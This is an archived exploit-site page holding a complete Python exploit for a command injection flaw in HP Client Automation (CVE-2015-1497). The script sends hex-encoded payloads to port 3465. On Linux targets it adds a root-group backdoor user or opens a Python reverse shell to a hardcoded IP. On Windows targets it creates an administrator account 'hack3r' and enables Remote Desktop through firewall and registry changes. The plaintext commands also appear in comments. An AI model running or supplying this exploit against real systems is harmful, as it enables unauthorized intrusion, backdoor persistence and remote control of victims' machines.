what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Client Automation 7.9 Command Injection

HP Client Automation 7.9 Command Injection
Posted Oct 10, 2016
Authored by slidingwindow0xff

HP Client Automation remote command injection exploit that adds backdoor accounts and provides a reverse shell. Author tested on version 7.9 but believes it should also work on 8.1, 9.0, and 9.1.

tags | exploit, remote, shell
advisories | CVE-2015-1497
SHA-256 | 21071151f479044290767d7497c10787d8aae743a7b1d0070b60601cbca11962

HP Client Automation 7.9 Command Injection

Change Mirror Download
# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]

#Can run following command on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"


#Runs following command on Windows target
#hide hide cmd.exe /c net user hack3r "hack3r" /add
#hide hide cmd.exe /c net localgroup administrators hack3r /add
#hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
#hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
#hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
#hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


import sys,socket

print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")

def exploit_Linux(target_IP,exploit_param):
if exploit_param == "1":
print("\n[+]Adding privileged user amiroot/nopass")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)

response = s.recv(1024)

if response == "\x00":
print("[+]Successfully added user amiroot/nopass")
else:
print("[-]Failed to add user amiroot/nopass")
s.close()

elif exploit_param == "2":
print("\n[+]Trying to get a reverse shell")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"

#Change this
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)

response = s.recv(1024)

if response == "\x00":
print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
else:
print("[-]Failed to get reverse shell")
s.close()

else:
print("\n[-]Invalid exploit parameter provided for Linux target")
sys.exit()


def exploit_Windows(target_IP):

counter = 0
print("[+]Adding a local user hack3r/hack3r")

request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)

response = s.recv(1024)

if response == "\x00":
print("[+]Successfully added user hack3r/hack3r")
counter+= 1
else:
print("[-]Failed to add user hack3r/hack3r")
s.close()


print("[+]Adding user 'hack3r' to Local Administrator's group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)

if response == "\x00":
print("[+]Successfully added user 'hack3r' to Local Administrators group")
counter+= 1
else:
print("[-]Failed to add user to 'hack3r' Local Administrators group")
s.close()

#Add user Hack3r to "Remote Desktop Users" Group
print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)

if response == "\x00":
print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
counter+= 1
else:
print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
s.close()

#Enable RDP
print("[+]Trying to enable Remote Desktop Service")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)

if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service")
s.close()


#Enable RDP for all profiles
print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)

if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service for all firewall profiles")
s.close()

#Setup target to listen for RDP connections
print("[+]Setting up the target server to listen to RDP connections")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)

if response == "\x00":
print("[+]Successfully setup the target server to listen to RDP connections")
counter+= 1
else:
print("[-]Failed to setup the target server to listen to RDP connections")
s.close()

if counter == 6:
print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
else:
print("\n[-]Exploit Failed..")

#main() function here
def main():

if len(sys.argv) < 2:
print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"
sys.exit()

target_IP = sys.argv[1]
target_OS = sys.argv[2].lower()

if target_OS == "windows":
exploit_Windows(target_IP)
elif target_OS == "linux":
exploit_param = sys.argv[3]
exploit_Linux(target_IP,exploit_param)
else:
print("\n[-]Invalid taret Operating System selected.")
sys.exit()

if __name__ == '__main__':
main()
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close